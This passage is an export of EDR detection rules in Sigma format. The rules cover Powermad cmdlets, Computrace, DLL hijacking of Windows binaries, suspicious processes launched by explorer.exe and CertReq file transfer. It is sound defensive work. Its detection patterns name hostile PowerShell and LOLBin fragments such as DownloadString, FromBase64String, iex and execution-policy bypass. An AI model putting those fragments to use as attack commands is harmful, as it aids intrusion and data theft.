"rule_name": "Malicious PowerShell Powermad Commandlets in Command-line",
"rule_description": "Detects various malicious commandlets in PowerShell scripts, generally associated with the Powermad framework.\nThe Powermad framework is generally associated with Active Directory Internal DNS (ADIDNS) exploitation for privilege escalation and credential collection through LLMNR poisoning (along with tools such as Inveigh) and SMB Relaying.\nIt is recommended to investigate the parent process for suspicious activities as well as other malicious actions stemming from the PowerShell host process.\n",
"rule_creation_date": "2022-10-12",
"rule_modified_date": "2025-04-10",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.collection",
"attack.credential_access",
"attack.defense_evasion",
"attack.execution",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1059.001",
"attack.t1550.002",
"attack.t1557.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2fe027bc-7a3c-412a-9493-8581215d5157",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "low",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.606892Z",
"creation_date": "2026-03-23T11:45:34.606895Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.606903Z",
"rule_level": "low",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://securelist.com/absolute-computrace-revisited/58278/",
"https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf",
"https://attack.mitre.org/techniques/T1569/002/"
],
"name": "t1569_002_computrace_rpcnetp.yml",
"content": "title: Computrace Agent Started\nid: 2fe027bc-7a3c-412a-9493-8581215d5157\ndescription: |\n Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\n Computrace (aka LoJack) is an Absolute Software solution used to trace stolen laptops.\n Attackers can use Computrace as a backdoor that can survive a reinstallation of the whole OS.\n It is recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\n If the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\nreferences:\n - https://securelist.com/absolute-computrace-revisited/58278/\n - https://www.blackhat.com/docs/us-14/materials/us-14-Kamlyuk-Kamluk-Computrace-Backdoor-Revisited.pdf\n - https://attack.mitre.org/techniques/T1569/002/\ndate: 2022/09/02\nmodified: 2025/01/30\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1569.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Trojan.Computrace\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image:\n - '?:\\Windows\\System32\\rpcnetp.exe'\n - '?:\\Windows\\SysWOW64\\rpcnet.exe'\n ParentImage: '?:\\Windows\\System32\\services.exe'\n condition: selection\nlevel: low\nconfidence: moderate\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2fe027bc-7a3c-412a-9493-8581215d5157",
"rule_name": "Computrace Agent Started",
"rule_description": "Detects the execution of rpcnet.exe or rpcnetp.exe which is the Computrace Agent (Communication Driver Agent).\nComputrace (aka LoJack) is an Absolute Software solution used to trace stolen laptops.\nAttackers can use Computrace as a backdoor that can survive a reinstallation of the whole OS.\nIt is recommended to disable this rule if the IT covered by HarfangLab EDR legitimately uses Computrace as an anti-theft solution.\nIf the IT does not use Computrace, it is recommended to analyze the behavior of the launched binary to look for malicious actions or network connections.\n",
"rule_creation_date": "2022-09-02",
"rule_modified_date": "2025-01-30",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1569.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "2ffd5e79-150c-4383-847e-9e74ca72179a",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.599622Z",
"creation_date": "2026-03-23T11:45:34.599625Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.599633Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/xforcered/WFH",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_ldifd.yml",
"content": "title: DLL Hijacking via ldifde.exe\nid: 2ffd5e79-150c-4383-847e-9e74ca72179a\ndescription: |\n Detects potential Windows DLL Hijacking via ldifde.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://github.com/xforcered/WFH\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'ldifde.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith:\n - '\\logoncli.dll'\n - '\\netutils.dll'\n - '\\urlmon.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "2ffd5e79-150c-4383-847e-9e74ca72179a",
"rule_name": "DLL Hijacking via ldifde.exe",
"rule_description": "Detects potential Windows DLL Hijacking via ldifde.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "weak",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.626639Z",
"creation_date": "2026-03-23T11:45:34.626641Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.626646Z",
"rule_level": "high",
"rule_confidence": "weak",
"rule_confidence_override": null,
"references": [
"https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/",
"https://www.zscaler.com/blogs/security-research/steal-it-campaign",
"https://attack.mitre.org/techniques/T1204/001/",
"https://attack.mitre.org/techniques/T1204/002/"
],
"name": "t1204_001_suspicious_process_parent_explorer.yml",
"content": "title: Suspicious Process Started by Explorer\nid: 3032fc60-f2f1-46ff-98c0-f6b537fe7513\ndescription: |\n Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\n This pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\n It is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\nreferences:\n - https://www.microsoft.com/security/blog/2021/05/28/breaking-down-nobeliums-latest-early-stage-toolset/\n - https://www.zscaler.com/blogs/security-research/steal-it-campaign\n - https://attack.mitre.org/techniques/T1204/001/\n - https://attack.mitre.org/techniques/T1204/002/\ndate: 2021/06/18\nmodified: 2026/01/14\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1204.001\n - attack.t1204.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Phishing\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_explorer:\n ParentImage|endswith: '\\explorer.exe'\n\n # cmd.exe\n selection_cmd:\n - Image|endswith: '\\cmd.exe'\n - OriginalFileName: 'Cmd.Exe'\n\n selection_cmd_1_1:\n CommandLine|contains : '/c '\n\n selection_cmd_1_2:\n CommandLine|contains:\n - '%comspec% '\n - 'cmd.exe /c start '\n - 'cmd.exe /c ?start '\n - 'attrib '\n - 'mshta '\n - 'findstr '\n\n selection_cmd_2_1:\n CommandLine|contains: '/c '\n\n selection_cmd_2_2:\n CommandLine|contains:\n - 'powershell'\n - 'p^o^w^e^r^s^h^e^l^l'\n\n selection_cmd_2_3:\n CommandLine|contains:\n - 'bypass '\n - 'WriteAllbytes'\n - 'FromBase64String'\n - ' iex '\n\n exclusion_cmd:\n CommandLine|contains:\n - '\\Microsoft\\Windows\\Start 
Menu\\Programs\\Startup\\'\n - '* ?:\\Windows\\system32\\ie4uinit.exe -ClearIconCache'\n - 'cmd.exe /c start cmd.exe /k pushd '\n - '?:\\Windows\\System32\\cmd.exe /c start shell:AppsFolder\\Microsoft.MicrosoftEdge_?????????????!MicrosoftEdge -private'\n - '?:\\Windows\\System32\\cmd.exe /c start /min /d ?:\\Users\\\\*\\AppData\\Local\\PDFProSuite PDFProSuite . --update'\n\n # powershell.exe\n selection_powershell_image:\n - Image|endswith: 'powershell.exe'\n - OriginalFileName: 'PowerShell.EXE'\n\n selection_powershell_commandline:\n CommandLine|contains:\n - 'DownloadFile'\n - 'DownloadString'\n - 'invoke-webrequest'\n - 'iwr'\n - '-join'\n - '-replace '\n - 'Start-Process rundll32'\n - 'Expand-Archive '\n - '::ReadAllBytes(*::WriteAllBytes('\n - ' -WindowStyle Hidden *Start-Process ?:\\' # C:\\\n - ' -WindowStyle Hidden *Start-Process ??:\\' # 'C:\\\n\n exclusion_powershell:\n CommandLine|contains:\n - ' Process Bypass '\n - ' -file ?:\\'\n - ' -file \"\\\\\\\\'\n - ' -command ?:\\'\n - \"}) -replace '\\\\s\\\\s+',\"\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\\\*\\anaconda3\\shell\\condabin\\conda-hook.ps1? ; conda activate ??:\\\\*\\anaconda3?'\n - '?:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe -ExecutionPolicy ByPass -NoExit -Command & ??:\\Users\\\\*\\Miniconda3\\shell\\condabin\\conda-hook.ps1? 
; conda activate ??:\\\\*\\Miniconda3'\n - \"?:\\\\Windows\\\\SysWOW64\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe -WindowStyle Hidden -NoLogo -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command & '?:\\\\Program Files (x86)\\\\LastPass\\\\AppxUpgradeEdge.ps1'\"\n\n # mshta.exe\n selection_mshta_image:\n - Image|endswith: '\\mshta.exe'\n - OriginalFileName: 'MSHTA.EXE'\n\n selection_mshta_commandline:\n CommandLine|contains:\n - 'http'\n - 'javascript'\n\n # wmic.exe\n selection_wmic_image:\n - Image|endswith: 'wmic.exe'\n - OriginalFileName: 'wmic.exe'\n\n selection_wmic_commandline:\n CommandLine|contains: 'format'\n\n # msiexec.exe\n selection_msiexec_image:\n - Image|endswith: 'msiexec.exe'\n - OriginalFileName: 'msiexec.exe'\n\n selection_msiexec_commandline:\n CommandLine|contains: '/q '\n\n # rundll32.exe\n selection_rundll32:\n - Image|endswith: '\\rundll32.exe'\n - OriginalFileName: 'RUNDLL32.EXE'\n\n selection_rundll32_1:\n CommandLine|contains: '%comspec% '\n selection_rundll32_2:\n CommandLine|contains|all:\n - 'vfcuzzz.dll'\n - 'CuzzSetDebugLoweringPoint'\n selection_rundll32_3:\n CommandLine|contains|all:\n - 'KM.FileSystem.dll'\n - 'KMGetInterface'\n selection_rundll32_4:\n CommandLine|contains|all:\n - 'diassvcs.dll'\n - 'InitializeComponent'\n selection_rundll32_5:\n CommandLine|contains|all:\n - 'GraphicalComponent.dll'\n - 'VisualServiceComponent'\n selection_rundll32_6:\n CommandLine|contains|all:\n - 'MsDiskMountService.dll'\n - 'DiskDriveIni'\n selection_rundll32_7:\n CommandLine|contains|all:\n - 'advpack.dll'\n - 'RegisterOCX'\n selection_rundll32_8:\n CommandLine|contains|all:\n - '\\\\\\\\'\n - ',0'\n selection_rundll32_9:\n CommandLine|contains|all:\n - 'alomart.dll'\n - 'PluginInit'\n\n # wscript.exe\n selection_wscript_image:\n - Image|endswith: '\\wscript.exe'\n - OriginalFileName: 'wscript.exe'\n\n selection_wscript_commandline:\n CommandLine|contains: ' /b '\n\n # odbcconf.exe\n selection_odbcconf_image:\n - Image|endswith: 
'\\odbcconf.exe'\n - OriginalFileName: 'odbcconf.exe'\n\n selection_odbcconf_commandline:\n CommandLine|contains:\n - 'odbcconf '\n - 'odbcconf.exe '\n\n condition: selection_explorer and (\n (selection_cmd and (all of selection_cmd_1_* or all of selection_cmd_2_*) and not exclusion_cmd) or\n (all of selection_powershell_* and not exclusion_powershell) or\n (all of selection_mshta_*) or\n (all of selection_wmic_*) or\n (all of selection_msiexec_*) or\n (selection_rundll32 and 1 of selection_rundll32_*) or\n (all of selection_wscript_*) or\n (all of selection_odbcconf_*)\n )\nlevel: high\nconfidence: weak\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3032fc60-f2f1-46ff-98c0-f6b537fe7513",
"rule_name": "Suspicious Process Started by Explorer",
"rule_description": "Detects the execution of suspicious processes spawned directly by explorer.exe, which commonly indicates that a user has clicked on a malicious link or attachment.\nThis pattern is frequently observed in phishing attacks where malicious files or URLs trigger the execution of dangerous processes like powershell.exe, cmd.exe, or unusual script interpreters with explorer.exe as the parent.\nIt is recommended to analyze the process command-line and file origin (by looking at the file downloads telemetry, for example).\n",
"rule_creation_date": "2021-06-18",
"rule_modified_date": "2026-01-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1204.001",
"attack.t1204.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "30336e99-9891-408e-b3a7-c5f83d445417",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603534Z",
"creation_date": "2026-03-23T11:45:34.603537Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603545Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Certreq",
"https://attack.mitre.org/techniques/T1105/"
],
"name": "t1105_certreq_lolbas_file_transfer.yml",
"content": "title: File Downloaded or Uploaded via CertReq\nid: 30336e99-9891-408e-b3a7-c5f83d445417\ndescription: |\n Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\n Adversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\n It is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Certreq\n - https://attack.mitre.org/techniques/T1105/\ndate: 2025/06/17\nmodified: 2025/06/17\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1105\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.CertReq\n - classification.Windows.Behavior.FileDownload\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith: '\\CertReq.exe'\n # Renamed binaries\n - OriginalFileName: 'CertReq.exe'\n\n selection_cmdline:\n CommandLine|contains|all:\n - '?Post'\n - '?config'\n\n condition: all of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "30336e99-9891-408e-b3a7-c5f83d445417",
"rule_name": "File Downloaded or Uploaded via CertReq",
"rule_description": "Detects a suspicious execution of the CertReq executable to download or exfiltrate a file.\nAdversaries may transfer tools or other files to a compromised environment using legitimate tool to evade detection.\nIt is recommended to check the content of the downloaded file and for other suspicious behavior by the parents of the current process.\n",
"rule_creation_date": "2025-06-17",
"rule_modified_date": "2025-06-17",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3076adfe-ea41-40f9-84c8-262457ee7219",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.594714Z",
"creation_date": "2026-03-23T11:45:34.594717Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.594725Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://wietze.github.io/blog/save-the-environment-variables",
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_cacls.yml",
"content": "title: DLL Hijacking via CACLS.exe\nid: 3076adfe-ea41-40f9-84c8-262457ee7219\ndescription: |\n Detects potential Windows DLL Hijacking via CACLS.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://wietze.github.io/blog/save-the-environment-variables\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'CACLS.EXE'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\ntmarta.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files (x86)\\Google\\Chrome\\Application\\'\n - '?:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files (x86)\\Microsoft\\Edge\\Application\\'\n - '?:\\Program Files\\Google\\Chrome\\Application\\'\n - '?:\\Program Files\\Microsoft\\EdgeWebView\\Application\\\\*\\'\n - '?:\\Program Files\\Microsoft\\Edge\\Application\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - 
'?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "3076adfe-ea41-40f9-84c8-262457ee7219",
"rule_name": "DLL Hijacking via CACLS.exe",
"rule_description": "Detects potential Windows DLL Hijacking via CACLS.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "307b0642-85e4-4475-95de-240e2cbc5108",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.618890Z",
"creation_date": "2026-03-23T11:45:34.618892Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.618896Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://github.com/xforcered/WFH",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_bitlockerwizard.yml",
"content": "title: DLL Hijacking via BitLockerWizard.exe\nid: 307b0642-85e4-4475-95de-240e2cbc5108\ndescription: |\n Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://github.com/xforcered/WFH\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/09/15\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'BitLockerWizard.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\fvewiz.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "307b0642-85e4-4475-95de-240e2cbc5108",
"rule_name": "DLL Hijacking via BitLockerWizard.exe",
"rule_description": "Detects potential Windows DLL Hijacking via BitLockerWizard.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers used this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-09-15",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "3085e5ea-4be0-4a6c-b0e8-442cc81ed08f",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.094233Z",
"creation_date": "2026-03-23T11:45:34.094235Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.094239Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1040/T1040.md#atomic-test-3---packet-capture-macos-using-tcpdump-or-tshark",
"https://attack.mitre.org/techniques/T1040/"
],
"name": "t1040_network_sniffing_tshark_macos.yml",
